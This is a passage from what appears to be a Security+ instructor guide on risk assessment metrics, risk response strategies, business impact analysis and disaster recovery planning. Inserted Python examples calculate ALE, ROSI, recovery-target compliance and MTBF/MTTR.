new contract to supply the adapters to provide connectivity for in-vehicle electronics
systems. Unknown to the company, a weakness in the design of the in-vehicle system
allows an adversary to use compromised wireless adapter firmware to affect the car's
control systems. The integrity of the upgrade process now has an impact on safety, and
is much higher risk.

Intellectual Property (IP) Theft

Intellectual property (IP) is data of commercial value that is owned by the organization.
This can mean copyrighted material for retail software, written work, video, and
music and product designs and patents. If IP data is exfiltrated it will lose much of its
commercial value. Losses can be very difficult to recover in territories where there are
not strong legal protections.

Software Compliance/Licensing

Breaking the terms of the end user licensing agreement (EULA) that imposes conditions
on installation of the software can expose the computer owner to substantial fines.
License issues are most likely to arise from shadow IT, where users install software
without change control approval. Network inventory management suites can report
software installations on each host and correlate those with the number of license
seats purchased. Licensing models can also be complex, especially where virtualization
and the cloud are concerned. It is important to train the administrative staff on the
specific license terms for each product.

Legacy Systems
Legacy systems are a source of risk because they no longer receive security updates
and because the expertise to maintain and troubleshoot them is a scarce resource.

Show Slide(s): Quantitative Risk Assessment

Quantitative Risk Assessment

There are quantitative and qualitative methods of performing risk analysis to evaluate
likelihood and impact.

Teaching Tip: Students need to learn these metrics.

Quantitative risk assessment aims to assign concrete values to each risk factor. (Image © 123RF.com.)

Quantitative risk assessment aims to assign concrete values to each risk factor.

• Single Loss Expectancy (SLE): the amount that would be lost in a single
occurrence of the risk factor. This is determined by multiplying the value of the
asset by an Exposure Factor (EF). EF is the percentage of the asset value that would
be lost.


• Annualized Loss Expectancy (ALE): the amount that would be lost over the
course of a year. This is determined by multiplying the SLE by the Annualized Rate
of Occurrence (ARO).

It is important to realize that the value of an asset does not refer solely to its material
value. The two principal additional considerations are direct costs associated with the
asset being compromised (downtime) and consequent costs to intangible assets, such
as the company's reputation. For example, a server may have a material cost of a few
hundred dollars. If the server were stolen, the costs incurred from not being able to
do business until it can be recovered or replaced could run to thousands of dollars.
In addition, that period of interruption where orders cannot be taken or go unfulfilled
leads customers to look at alternative suppliers, resulting in perhaps more thousands
of lost sales and goodwill.

The problem with quantitative risk assessment is that the process of determining and
assigning these values is complex and time-consuming. The accuracy of the values
assigned is also difficult to determine without historical data (often, it has to be based
on subjective guesswork). However, over time and with experience, this approach can
yield a detailed and sophisticated description of assets and risks and provide a sound
basis for justifying and prioritizing security expenditure.

Show Slide(s): Qualitative Risk Assessment

Qualitative Risk Assessment

Qualitative risk assessment avoids the complexity of the quantitative approach and
is focused on identifying significant risk factors. The qualitative approach seeks out
people's opinions of which risk factors are significant. Assets and risks may be placed
in simple categories. For example, assets could be categorized as Irreplaceable, High
Value, Medium Value, and Low Value; risks could be categorized as one-off or recurring
and as Critical, High, Medium, and Low probability.

Another simple approach is the "heat map" or "Traffic Light" impact matrix. For each risk,
a simple Red, Yellow, or Green indicator can be put into each column to represent the
severity of the risk, its likelihood, cost of controls, and so on. This approach is simplistic
but does give an immediate impression of where efforts should be concentrated to
improve security.

Traffic light impact grid.

FIPS 199 (nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.199.pdf) discusses how to apply
security categorizations (SC) to information systems based on the impact that a breach
of confidentiality, integrity, or availability would have on the organization as a whole.
Potential impacts can be classified as:


• Low: minor damage or loss to an asset or loss of performance (though essential
functions remain operational).

• Moderate: significant damage or loss to assets or performance.

• High: major damage or loss or the inability to perform one or more essential
functions.

Show Slide(s): Risk Management Strategies

Risk Management Strategies

The result of a quantitative or qualitative analysis is a measure of inherent risk.
Inherent risk is the level of risk before any type of mitigation has been attempted.
In theory, security controls or countermeasures could be introduced to address
every risk factor. The difficulty is that security controls can be expensive, so you must
balance the cost of the control with the cost associated with the risk. It is not possible
to eliminate risk; rather the aim is to mitigate risk factors to the point where the
organization is exposed only to a level of risk that it can afford. The overall status of
risk management is referred to as risk posture. Risk posture shows which risk response
options can be identified and prioritized. For example, you might identify the following
priorities:

• Regulatory requirements to deploy security controls and make demonstrable efforts
to reduce risk. Examples of legislation and regulation that mandate risk controls
include SOX, HIPAA, Gramm-Leach-Bliley, the Homeland Security Act, PCI DSS
regulations, and various personal data protection measures.

• High value asset, regardless of the likelihood of the threat(s).

• Threats with high likelihood (that is, high ARO).

• Procedures, equipment, or software that increase the likelihood of threats (for
example, legacy applications, lack of user training, old software versions, unpatched
software, running unnecessary services, not having auditing procedures in place,
and so on).

Teaching Tip: Make sure students can distinguish types of risk response.

In the quantitative approach, the Return on Security Investment (ROSI) can be determined
by calculating a new ALE, based on the reduction in loss that will be created by the security
controls introduced. The formula for calculating ROSI is: (ALE - ALEm - Cost of Solution) /
Cost of Solution, where ALE is the ALE before controls and ALEm is after controls.
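The SLE and ALE definitions from the quantitative risk assessment section and the ROSI formula in this paragraph, carried through in Python as an added example (not the guide's own material). The portal asset value, exposure factors, AROs and control costs are constructed figures, and the control names are hypothetical.

```python
"""SLE, ALE and ROSI for one risk scenario and a set of candidate controls.

Added example, not from the CompTIA guide. The portal's asset value, exposure
factors, annualized rates and control costs are constructed figures; the control
names are hypothetical.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class RiskScenario:
    name: str
    asset_value: float      # AV: material value plus downtime and reputational cost
    exposure_factor: float  # EF: fraction of AV lost in one occurrence (0.0 to 1.0)
    aro: float              # Annualized Rate of Occurrence: expected incidents per year

    def sle(self) -> float:
        """Single Loss Expectancy: SLE = AV x EF."""
        return self.asset_value * self.exposure_factor

    def ale(self) -> float:
        """Annualized Loss Expectancy: ALE = SLE x ARO."""
        return self.sle() * self.aro


@dataclass(frozen=True)
class Control:
    name: str
    annual_cost: float            # Cost of Solution, per year, in the ROSI formula
    exposure_factor_after: float  # EF once the control is in place (reduces impact)
    aro_after: float              # ARO once the control is in place (reduces likelihood)

    def mitigated(self, risk: RiskScenario) -> RiskScenario:
        """The same scenario with this control's effect on EF and ARO applied."""
        return RiskScenario(risk.name, risk.asset_value,
                            self.exposure_factor_after, self.aro_after)


def rosi(ale_before: float, ale_after: float, cost: float) -> float:
    """ROSI = (ALE - ALEm - Cost of Solution) / Cost of Solution.

    ALE is the loss expectancy before controls, ALEm the expectancy after them."""
    if cost <= 0:
        raise ValueError("Cost of Solution must be positive; a free control has no ROSI")
    return (ale_before - ale_after - cost) / cost


def evaluate(risk: RiskScenario, control: Control) -> dict:
    """Compute ALE before and after the control and the resulting ROSI."""
    ale_before = risk.ale()
    ale_after = control.mitigated(risk).ale()
    return {
        "control": control.name,
        "ale_before": ale_before,
        "ale_after": ale_after,
        "cost": control.annual_cost,
        "rosi": rosi(ale_before, ale_after, control.annual_cost),
    }


def rank_controls(risk: RiskScenario, controls) -> list:
    """Candidate controls ordered by ROSI, best first. A negative ROSI means the
    control costs more per year than the loss it avoids."""
    return sorted((evaluate(risk, c) for c in controls),
                  key=lambda e: e["rosi"], reverse=True)


# Constructed scenario in the spirit of the text's e-commerce example: a portal
# worth $200,000 (including downtime and goodwill), each DDoS outage destroying
# 25% of that value, and two outages a year expected.
PORTAL = RiskScenario("DDoS against e-commerce portal",
                      asset_value=200_000.0, exposure_factor=0.25, aro=2.0)

# Two hypothetical controls with the same technical effect but different prices.
CONTROLS = [
    Control("Managed DDoS mitigation service", annual_cost=30_000.0,
            exposure_factor_after=0.10, aro_after=1.0),
    Control("Over-provisioned load balancer tier", annual_cost=100_000.0,
            exposure_factor_after=0.10, aro_after=1.0),
]


if __name__ == "__main__":
    print(f"SLE = {PORTAL.sle():,.0f}  ALE = {PORTAL.ale():,.0f}")
    for row in rank_controls(PORTAL, CONTROLS):
        print(f"{row['control']:<40} ALEm = {row['ale_after']:>9,.0f}  "
              f"cost = {row['cost']:>9,.0f}  ROSI = {row['rosi']:+.2f}")
```

With these figures the cheaper control returns about 1.67 dollars of avoided loss per dollar spent, while the expensive one has a negative ROSI and would not be justified on loss reduction alone.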

Risk mitigation (or remediation) is the overall process of reducing exposure to or
the effects of risk factors. If you deploy a countermeasure that reduces exposure to
a threat or vulnerability that is risk deterrence (or reduction). Risk reduction refers
to controls that can either make a risk incident less likely or less costly (or perhaps
both). For example, if fire is a threat, a policy strictly controlling the use of flammable
materials on site reduces likelihood, while a system of alarms and sprinklers reduces
impact by (hopefully) containing any incident to a small area. Another example is
off-site data backup, which provides a remediation option in the event of servers being
destroyed by fire.

Show Slide(s): Risk Avoidance and Risk Transference

Risk Avoidance and Risk Transference

Avoidance means that you stop doing the activity that is risk-bearing. For example, a
company may develop an in-house application for managing inventory and then try
to sell it. If while selling it, the application is discovered to have numerous security
vulnerabilities that generate complaints and threats of legal action, the company may
make the decision that the cost of maintaining the security of the software is not worth
the revenue and withdraw it from sale. Obviously this would generate considerable bad
feeling among existing customers. Avoidance is not often a credible option.

Transference (or sharing) means assigning risk to a third party, such as an insurance
company or a contract with a supplier that defines liabilities. For example, a company
could stop in-house maintenance of an e-commerce site and contract the services to
a third party, who would be liable for any fraud or data theft. Specific cybersecurity
insurance or cyberliability coverage protects against fines and liabilities arising from
data breaches and DoS attacks.

Note that in this sort of case it is relatively simple to transfer the obvious risks, but risks to
the company's reputation remain. If a customer's credit card details are stolen because
they used your unsecure e-commerce application, the customer won't care if you or a third
party were nominally responsible for security. It is also unlikely that legal liabilities could be
completely transferred in this way. For example, insurance terms are likely to require that
best practice risk controls have been implemented.

Show Slide(s): Risk Acceptance and Risk Appetite

Risk Acceptance and Risk Appetite

It is not possible to reduce risks to zero, so part of risk posture is concerned with
managing what risks remain.

Teaching Tip: Make sure students can distinguish these terms, especially inherent,
residual, and control risk.

Risk Acceptance

Risk acceptance (or tolerance) means that no countermeasures are put in place either
because the level of risk does not justify the cost or because there will be unavoidable
delay before the countermeasures are deployed. In this case, you should continue to
monitor the risk (as opposed to ignoring it).

Residual Risk and Risk Appetite

Where inherent risk is the risk before mitigation, residual risk is the likelihood
and impact after specific mitigation, transference, or acceptance measures have
been applied. Risk appetite is a strategic assessment of what level of residual risk is
tolerable. Risk appetite is broad in scope. Where risk acceptance has the scope of a
single system, risk appetite has a project- or institution-wide scope. Risk appetite is
constrained by regulation and compliance.

Control Risk

Control risk is a measure of how much less effective a security control has become
over time. For example, antivirus became quite capable of detecting malware on the
basis of signatures, but then less effective as threat actors started to obfuscate code.
Control risk can also refer to a security control that was never effective in mitigating
inherent risk. This illustrates the point that risk management is an ongoing process,
requiring continual reassessment and re-prioritization.

Show Slide(s): Risk Awareness

Risk Awareness

To ensure that the business stakeholders understand each risk scenario, you should
articulate it such that the cause and effect can clearly be understood by the owner
of the asset. A DoS risk should be put into plain language that describes how the risk
would occur and, as a result, what access is being denied to whom, and the effect to
the business. For example: "As a result of malicious or hacking activity against the
public website, the site may become overloaded, preventing clients from accessing
their client order accounts. This will result in a loss of sales for so many hours and a
potential loss of revenue of so many dollars."


A risk register is a document showing the results of risk assessments in a
comprehensible format. The register may resemble the heat map risk matrix
shown earlier with columns for impact and likelihood ratings, date of identification,
description, countermeasures, owner/route for escalation, and status. Risk registers
are also commonly depicted as scatterplot graphs, where impact and likelihood
are each an axis, and the plot point is associated with a legend that includes more
information about the nature of the plotted risk. A risk register should be shared
between stakeholders (executives, department managers, and senior technicians) so
that they understand the risks associated with the workflows that they manage.


Review Activity:
Risk Management Processes and Concepts

Answer the following questions:

1. What areas of a business or workflow must you examine to assess
multiparty risk?

You need to examine supply chain dependencies to identify how problems with one
or more suppliers would impact your business. You also need to examine customer
relationships to determine what liabilities you have in the event of an incident
impacting your ability to supply a product or service and what impact disruption
of important customer accounts would have, should cyber incidents disrupt their
business.

2. What risk type arises from shadow IT?

Shadow IT is the deployment of hardware, software, or cloud services without the
sanction of the system owner (typically the IT department). The system owner will
typically be liable for software compliance/licensing risks.

3. What metric(s) could be used to make a quantitative calculation of risk due
to a specific threat to a specific function or asset?

Single Loss Expectancy (SLE) or Annual Loss Expectancy (ALE). ALE is SLE multiplied by
ARO (Annual Rate of Occurrence).

4. What factors determine the selection of security controls in terms of an
overall budget?

The risk (as determined by impact and likelihood) compared to the cost of the control.
This metric can be calculated as Return on Security Investment (ROSI).

5. What type of risk mitigation option is offered by purchasing insurance?

Risk transference.

6. What is a risk register?

A document highlighting the results of risk assessments in an easily comprehensible
format (such as a heat map or traffic light grid). Its purpose is for department
managers and technicians to understand risks associated with the workflows that
they manage.

7. What is control risk?

Control risk arises when a security control is ineffective at mitigating the impact and/or
likelihood of the risk factor it was deployed to mitigate. The control might not work as
hoped, or it might become less effective over time.

esson 1 Summarizing isk anagement Concepts | Topic 1 A


Topic 19B
Explain Business Impact Analysis Concepts

EXAM OBJECTIVES COVERED
5.4 Summarize risk management processes and concepts

Teaching Tip: This topic completes the coverage of the risk management objective by looking at disasters and business impact analysis.

Business impact analysis informs risk assessment by documenting the workflows that run the organization and the critical assets and systems that support them. Key metrics quantify how much downtime those systems can withstand. As a security professional, you will often be asked to produce this type of analysis.

Show Slide(s): Business Impact Analysis

Business Impact Analysis
Business impact analysis (BIA) is the process of assessing what losses might occur for a range of threat scenarios. For instance, if a DDoS attack suspends an e-commerce portal for five hours, the business impact analysis will be able to quantify the losses from orders not made and customers moving permanently to other suppliers, based on historic data. The likelihood of a DDoS attack can be assessed on an annualized basis to determine annualized impact, in terms of costs. You then have the information required to assess whether a security control, such as load balancing or managed DDoS mitigation, is worth the investment.

Teaching Tip: Contrast the impact analysis activity with the continuity analysis activity. Impact analysis prioritizes investment in continuity.

Where BIA identifies risks, business continuity planning (BCP) identifies controls and processes that enable an organization to maintain critical workflows in the face of some adverse event.

The term continuity of operations planning (COOP) refers to the same sorts of activities when undertaken by a government agency, rather than a business.
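The DDoS scenario above can be worked through with the quantitative metrics this lesson uses (SLE, ARO, ALE) and the Return on Security Investment comparison that decides whether a control is worth buying. The following is an added example written for this edition, not code from the CompTIA guide; the asset value, exposure factor, occurrence rate, control costs and control effects are all constructed assumptions, not vendor or survey figures.

```python
# Quantitative risk for the DDoS scenario: SLE, ALE and ROSI.
# Added example; not part of the CompTIA guide. All monetary figures,
# exposure factors and control effects are constructed assumptions.
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Scenario:
    name: str
    asset_value: float       # value exposed by one incident, in currency units
    exposure_factor: float   # fraction of asset_value lost per incident (0.0 to 1.0)
    aro: float               # Annual Rate of Occurrence: expected incidents per year

    def sle(self) -> float:
        """Single Loss Expectancy: expected loss from one occurrence."""
        return self.asset_value * self.exposure_factor

    def ale(self) -> float:
        """Annual Loss Expectancy: SLE multiplied by ARO."""
        return self.sle() * self.aro


@dataclass(frozen=True)
class Control:
    name: str
    annual_cost: float
    exposure_reduction: float  # fraction of the exposure factor the control removes
    aro_reduction: float       # fraction of the ARO the control removes

    def apply(self, before: Scenario) -> Scenario:
        """Residual scenario once the control is in place."""
        return Scenario(
            name=f"{before.name} with {self.name}",
            asset_value=before.asset_value,
            exposure_factor=before.exposure_factor * (1.0 - self.exposure_reduction),
            aro=before.aro * (1.0 - self.aro_reduction),
        )


def rosi(before: Scenario, control: Control) -> float:
    """Return on Security Investment:
    (ALE before - ALE after - annual control cost) / annual control cost.
    Positive means the control saves more per year than it costs."""
    saved = before.ale() - control.apply(before).ale()
    return (saved - control.annual_cost) / control.annual_cost


def choose_control(before: Scenario, controls: List[Control]) -> Optional[Control]:
    """Control with the best ROSI, or None if no control pays for itself."""
    best = max(controls, key=lambda c: rosi(before, c))
    return best if rosi(before, best) > 0 else None


# Constructed scenario: a five-hour DDoS outage of an e-commerce portal,
# expected about twice a year.
PORTAL_DDOS = Scenario("E-commerce portal DDoS", asset_value=500_000.0,
                       exposure_factor=0.2, aro=2.0)

# Constructed controls with assumed effects (not vendor figures).
MANAGED_MITIGATION = Control("managed DDoS mitigation", annual_cost=60_000.0,
                             exposure_reduction=0.9, aro_reduction=0.0)
LOAD_BALANCING = Control("additional load balancing", annual_cost=150_000.0,
                         exposure_reduction=0.5, aro_reduction=0.0)
CONTROLS = [MANAGED_MITIGATION, LOAD_BALANCING]

if __name__ == "__main__":
    print(f"SLE {PORTAL_DDOS.sle():,.0f}  ALE {PORTAL_DDOS.ale():,.0f}")
    for c in CONTROLS:
        print(f"{c.name}: ROSI {rosi(PORTAL_DDOS, c):.2f}")
    pick = choose_control(PORTAL_DDOS, CONTROLS)
    print("recommended:", pick.name if pick else "accept the risk")
```

With these assumptions the portal has an SLE of 100,000 and an ALE of 200,000; managed mitigation returns 2.0 per unit spent while the more expensive load balancing option has a negative ROSI, so only the first is worth funding on these numbers. The point of the exercise is that the decision changes with the inputs, which is why the BIA has to ground ARO and exposure in historic data rather than guesswork.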

Show Slide(s): Mission Essential Functions

Mission Essential Functions
A mission essential function (MEF) is one that cannot be deferred. This means that the organization must be able to perform the function as close to continually as possible, and if there is any service disruption, the mission essential functions must be restored first.

Teaching Tip: Students need to learn these metrics.

Functions that act as support for the business or an MEF but are not critical in themselves are referred to as primary business functions (PBF).

Analysis of mission essential functions is generally governed by four main metrics:

• Maximum tolerable downtime (MTD) is the longest period of time that a business function outage may occur for without causing irrecoverable business failure. Each business process can have its own MTD, such as a range of minutes to hours for critical functions, a longer span of hours for urgent functions, seven days for normal functions, and so on. MTDs vary by company and event. Each function may be supported by multiple systems and assets. The MTD sets the upper limit on the amount of recovery time that system and asset owners have to resume operations. For example, an organization specializing in medical equipment may be able to exist without incoming manufacturing supplies for three months because it has stockpiled a sizable inventory. After three months, the organization will not have sufficient supplies and may not be able to manufacture additional products, therefore leading to failure. In this case, the MTD is three months.

• Recovery time objective (RTO) is the period following a disaster that an individual IT system may remain offline. This represents the amount of time it takes to identify that there is a problem and then perform recovery (restore from backup or switch in an alternative system, for instance).

• Work Recovery Time (WRT). Following systems recovery, there may be additional work to reintegrate different systems, test overall functionality, and brief system users on any changes or different working practices so that the business function is again fully supported.

RTO + WRT must not exceed MTD.

• Recovery Point Objective (RPO) is the amount of data loss that a system can sustain, measured in time. That is, if a database is destroyed by a virus, an RPO of 24 hours means that the data can be recovered from a backup copy to a point not more than 24 hours before the database was infected.

[Figure: Metrics governing mission essential functions. (Images © 123RF.com.)]

For example, a customer leads database might be able to sustain the loss of a few hours' or days' worth of data (the salespeople will generally be able to remember who they have contacted and rekey the data manually). Conversely, order processing may be considered more critical, as any loss will represent lost orders and it may be impossible to recapture web orders or other processes initiated only through the computer system, such as linked records to accounting and fulfillment.

MTD and RPO help to determine which business functions are critical and also to specify appropriate risk countermeasures. For example, if your RPO is measured in days, then a simple tape backup system should suffice; if RPO is zero or measured in minutes or seconds, a more expensive server cluster backup and redundancy solution will be required.
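The four metrics are only useful when they are checked against each other and against what the current backup arrangement actually delivers. The following is an added example for this edition, not code from the CompTIA guide: it encodes the rule that RTO + WRT must not exceed MTD, compares the backup interval with the RPO (with a periodic copy, the worst case is a failure just before the next run), and maps the RPO to the kind of countermeasure described above. The three functions and all of their targets are constructed.

```python
# Recovery targets for business functions: check RTO + WRT against MTD and the
# backup interval against RPO. Added example; not from the CompTIA guide. The
# functions and targets below are constructed.
from dataclasses import dataclass
from datetime import timedelta
from typing import List


@dataclass(frozen=True)
class RecoveryTargets:
    function: str
    mtd: timedelta              # maximum tolerable downtime of the business function
    rto: timedelta              # time to detect the outage and restore the IT system
    wrt: timedelta              # work recovery time: reintegrate, test, brief users
    rpo: timedelta              # tolerable data loss, expressed as time
    backup_interval: timedelta  # how often the current backup or replication runs


def within_mtd(t: RecoveryTargets) -> bool:
    """The rule from the text: RTO + WRT must not exceed MTD."""
    return t.rto + t.wrt <= t.mtd


def worst_case_data_loss(t: RecoveryTargets) -> timedelta:
    """With periodic copies, the worst case is a failure just before the next run,
    so everything written since the last run is lost."""
    return t.backup_interval


def meets_rpo(t: RecoveryTargets) -> bool:
    return worst_case_data_loss(t) <= t.rpo


def recommended_protection(t: RecoveryTargets) -> str:
    """Map the RPO to the kind of countermeasure the text describes."""
    if t.rpo == timedelta(0):
        return "synchronous replication or clustered storage (no data loss)"
    if t.rpo < timedelta(hours=1):
        return "continuous or near-continuous replication"
    return "scheduled backup at least every " + str(t.rpo)


def findings(targets: List[RecoveryTargets]) -> List[str]:
    """One line per violated target; an empty list means every target is met."""
    out: List[str] = []
    for t in targets:
        if not within_mtd(t):
            out.append(f"{t.function}: RTO {t.rto} + WRT {t.wrt} exceeds MTD {t.mtd}")
        if not meets_rpo(t):
            out.append(f"{t.function}: backup every {t.backup_interval} cannot meet "
                       f"RPO {t.rpo}; consider {recommended_protection(t)}")
    return out


# Constructed targets for three functions.
TARGETS = [
    RecoveryTargets("order processing", mtd=timedelta(hours=4), rto=timedelta(hours=2),
                    wrt=timedelta(hours=1), rpo=timedelta(minutes=5),
                    backup_interval=timedelta(hours=24)),
    RecoveryTargets("customer leads database", mtd=timedelta(days=7), rto=timedelta(days=2),
                    wrt=timedelta(days=1), rpo=timedelta(hours=24),
                    backup_interval=timedelta(hours=24)),
    RecoveryTargets("payroll", mtd=timedelta(hours=8), rto=timedelta(hours=6),
                    wrt=timedelta(hours=4), rpo=timedelta(hours=1),
                    backup_interval=timedelta(hours=1)),
]

if __name__ == "__main__":
    for line in findings(TARGETS) or ["all recovery targets met"]:
        print(line)
```

Run as written, it reports two findings: order processing meets its MTD but a nightly backup cannot satisfy a five-minute RPO, and payroll's RTO plus WRT (10 hours) overruns an 8-hour MTD even though its hourly backup meets the RPO. The customer leads database, with a 24-hour RPO, is served adequately by the daily backup, which is the contrast the text draws.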

Show Slide(s): Identification of Critical Systems

Identification of Critical Systems
To support the resiliency of mission essential and primary business functions, it is crucial to perform an identification of critical systems. This means compiling an inventory of business processes and the assets that support them. Asset types include:
• People (employees, visitors, and suppliers).
• Tangible assets (buildings, furniture, equipment and machinery (plant), ICT equipment, electronic data files, and paper documents).
• Intangible assets (ideas, commercial reputation, brand, and so on).
• Procedures (supply chains, critical procedures, standard operating procedures).

For mission essential functions, it is important to reduce the number of dependencies between components. Dependencies are identified by performing a business process analysis (BPA) for each function. The BPA should identify the following factors:
• Inputs: the sources of information for performing the function (including the impact if these are delayed or out of sequence).
• Hardware: the particular server or data center that performs the processing.
• Staff and other resources supporting the function.
• Outputs: the data or resources produced by the function.
• Process flow: a step-by-step description of how the function is performed.

Show Slide(s): Single Points of Failure

Single Points of Failure
Each IT system will be supported by hardware assets, such as servers, disk arrays, switches, routers, and so on. Reducing dependencies means the system design can more easily eliminate the sort of weakness that comes from these devices becoming single points of failure (SPoF). A SPoF is an asset that causes the entire workflow to fail if it is damaged or otherwise not available. SPoFs can be mitigated by provisioning redundant components. Metrics for asset reliability can help to determine when and how much redundancy is required. Some of the main KPIs relating to service availability are as follows:

Teaching Tip: Students need to learn the use of these metrics.

• Mean time to failure (MTTF) and mean time between failures (MTBF) represent the expected lifetime of a product. MTTF should be used for non-repairable assets. For example, a hard drive may be described with an MTTF, while a server (which could be repaired by replacing the hard drive) would be described with an MTBF. You will often see MTBF used indiscriminately, however. For most devices, failure is more likely early or late in life, producing the so-called "bathtub curve."

MTTF/MTBF can be used to determine the amount of asset redundancy a system should have. A redundant system can failover to another asset if there is a fault and continue to operate normally. It can also be used to work out how likely failures are to occur.

• The calculation for MTBF is the total time divided by the number of failures. For example, if a set of devices each run for the same number of hours and two of them fail, the MTBF is the total device-hours divided by 2, expressed in hours per failure.

• The calculation for MTTF for the same test is the total time divided by the number of devices, with the result again expressed in hours per failure.

• Mean time to repair (MTTR) is a measure of the time taken to correct a fault so that the system is restored to full operation. This can also be described as mean time to "replace" or "recover." This metric is important in determining the overall recovery time objective (RTO).
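The three reliability metrics above are easier to keep straight when computed from one set of test data. The following is an added example for this edition, not code from the CompTIA guide. It applies the definitions exactly as the text gives them (MTBF as total operating time over failures, MTTF as total operating time over devices, MTTR as total repair time over repairs) to a constructed fleet of eight devices, and adds the standard steady-state relation availability = MTBF / (MTBF + MTTR), which the text does not state but which connects these KPIs to the availability percentages used later in this guide.

```python
# MTBF, MTTF and MTTR from a constructed device-test record, following the
# definitions in the text. Added example; not from the CompTIA guide.
from dataclasses import dataclass, field
from typing import List


@dataclass
class DeviceRecord:
    device: str
    operating_hours: float                                     # hours run during the test
    repair_hours: List[float] = field(default_factory=list)    # one entry per failure


def total_operating_hours(fleet: List[DeviceRecord]) -> float:
    return sum(d.operating_hours for d in fleet)


def failure_count(fleet: List[DeviceRecord]) -> int:
    return sum(len(d.repair_hours) for d in fleet)


def mtbf(fleet: List[DeviceRecord]) -> float:
    """Mean time between failures: total operating time / number of failures.
    Use for repairable assets (a server)."""
    failures = failure_count(fleet)
    if failures == 0:
        raise ValueError("no failures observed: MTBF cannot be estimated from this sample")
    return total_operating_hours(fleet) / failures


def mttf(fleet: List[DeviceRecord]) -> float:
    """Mean time to failure as defined in the text: total operating time / number
    of devices. Use for non-repairable assets (a hard drive)."""
    return total_operating_hours(fleet) / len(fleet)


def mttr(fleet: List[DeviceRecord]) -> float:
    """Mean time to repair: total repair time / number of repairs."""
    repairs = [h for d in fleet for h in d.repair_hours]
    if not repairs:
        raise ValueError("no repairs recorded")
    return sum(repairs) / len(repairs)


def steady_state_availability(fleet: List[DeviceRecord]) -> float:
    """Fraction of time a repairable asset is up: MTBF / (MTBF + MTTR).
    Standard reliability-engineering relation, not stated in the text."""
    up, down = mtbf(fleet), mttr(fleet)
    return up / (up + down)


# Constructed test: eight identical devices each run for 120 hours; two of them
# fail during the test and are repaired (3 h and 5 h respectively).
FLEET = [DeviceRecord(f"dev{i}", 120.0) for i in range(8)]
FLEET[2].repair_hours.append(3.0)
FLEET[6].repair_hours.append(5.0)

if __name__ == "__main__":
    print(f"MTBF {mtbf(FLEET):.0f} h/failure, MTTF {mttf(FLEET):.0f} h, "
          f"MTTR {mttr(FLEET):.1f} h, "
          f"availability {steady_state_availability(FLEET):.4%}")
```

For this fleet the total operating time is 960 device-hours, giving an MTBF of 480 hours per failure and an MTTF of 120 hours, with an MTTR of 4 hours. Note the divergence between MTBF and MTTF for the same data: the first is per failure, the second per device, which is why the text warns about the terms being used interchangeably.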

NIST has published a guide to resiliency and IT contingency planning (SP 800-34), available at nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-34r1.pdf.

Show Slide(s): Disasters

Disasters
In terms of business continuity, a disaster is an event that could threaten mission essential functions. For example, a privacy breach is a critical incident, but it is probably not a direct threat to business functions. An earthquake that destroys a data center is a disaster-level event. Disaster response involves many of the same principles and procedures as incident response, but at a larger scale.

Internal versus External
An internal disaster is one that is caused by malicious activity or by accident by an employee or contractor (anyone or anything whose presence within the company or organization has been authorized). Internal disaster also encompasses system faults, such as wiring causing a fire. Conversely, external disaster events are caused by threat actors who have no privileged access. External disaster includes disasters that have an impact on the organization through wider environmental or social impacts, such as disruption of public services or impacts to the supply chain.

Person-Made
A person-made disaster event is one where human agency is the primary cause. Typical examples other than devastating cybersecurity incidents include terrorism, war, vandalism, pollution, and arson. There can also be accidental person-made disasters, such as cutting through power or telecoms cabling.

Environmental
An environmental disaster, or natural disaster, is one that could not be prevented through human agency. Environmental disasters include river or sea floods, earthquakes, storms, disease, and so on. Natural disasters may be quite predictable (as is the case with areas prone to flooding or storm damage) or unexpected, and therefore difficult to plan for.

Most natural or environmental disasters can also have a human or artificial source. For example, flooding might be more likely because dams are not adequately maintained; a wildfire could be the result of arson or poorly maintained power infrastructure.

Site Risk Assessment
Where cybersecurity generally has financial impacts, site safety can have impacts to life and property. A site risk assessment evaluates exposure to the following types of factor:
• Risk from disaster events, such as earthquake, flood, and fire. These events can occur naturally or from person-made causes.
• Risk from disruption to utilities, such as electricity, water, and transportation. These risks are higher in geographically isolated sites.
• Risk to health and safety from on-premises electromechanical systems or chemicals.


Show Slide(s): Disaster Recovery Plans

Disaster Recovery Plans
Disaster recovery plans (DRPs) describe the specific procedures to follow to recover a system or site to a working state following a disaster-level event. The DRP should accomplish the following:
1. Identify scenarios for natural and non-natural disaster and options for protecting systems. Plans need to account for risk (a combination of the likelihood the disaster will occur and the possible impact on the organization) and cost.

There is no point implementing disaster recovery plans that financially cripple the organization. The business case is made by comparing the cost of recovery measures against the cost of downtime. The cost of the recovery plan should not generally exceed the downtime cost.

2. Identify tasks, resources, and responsibilities for responding to a disaster.
• Who is responsible for doing what? How can they be contacted? What happens if they are not available?
• Which functions are most critical? Where should effort first be concentrated?
• What resources are available? Should they be pre-purchased and held in stock? Will the disaster affect availability of supplies?
• What are the timescales for resumption of normal operations?

3. Train staff in the disaster planning procedures and how to react well to change.

As well as restoring systems, the disaster recovery plan should identify stakeholders who need to be informed about incidents with impacts to life and safety. There may be a legal requirement to inform the police, fire service, or building inspectors about any safety-related or criminal incidents. If third-party or personal data is lost or stolen, the data subjects may need to be informed. If the disaster affects services, customers need to be informed about the time to fix and any alternative arrangements that can be made.

Show Slide(s): Functional Recovery Plans

Functional Recovery Plans
Because disasters are extreme and (hopefully) rare events, it is very difficult to evaluate how effective or functional a recovery plan is. There are four principal methods for assessing the functionality of recovery plans:
• Walkthroughs, workshops, and orientation seminars: often used to provide basic awareness and training for disaster recovery team members, these exercises describe the contents of DRPs and other plans, and the roles and responsibilities outlined in those plans.
• Tabletop exercises: staff "ghost" the same procedures as they would in a disaster, without actually creating disaster conditions or applying or changing anything. These are simple to set up but do not provide any sort of practical evidence of things that could go wrong, time to complete, and so on.
• Functional exercises: action-based sessions where employees can validate DRPs by performing scenario-based activities in a simulated environment.
• Full-scale exercises: action-based sessions that reflect real situations; these exercises are held onsite and use real equipment and real personnel as much as possible. Full-scale exercises are often conducted by public agencies, but local organizations might be asked to participate.


Review Activity:
Business Impact Analysis Concepts
Answer the following questions:

1. What factor is most likely to reduce a system's resiliency?

Single points of failure.

2. True or false? RTO expresses the amount of time required to identify and resolve a problem within a single system or asset.

True.

3. What is measured by MTBF?

Mean time between failures (MTBF) represents the expected reliability of a product over its lifetime.

4. What is a tabletop exercise?

A discussion-based drill of emergency response procedures. Staff may role-play and discuss their responses, but actual emergency conditions are not simulated.

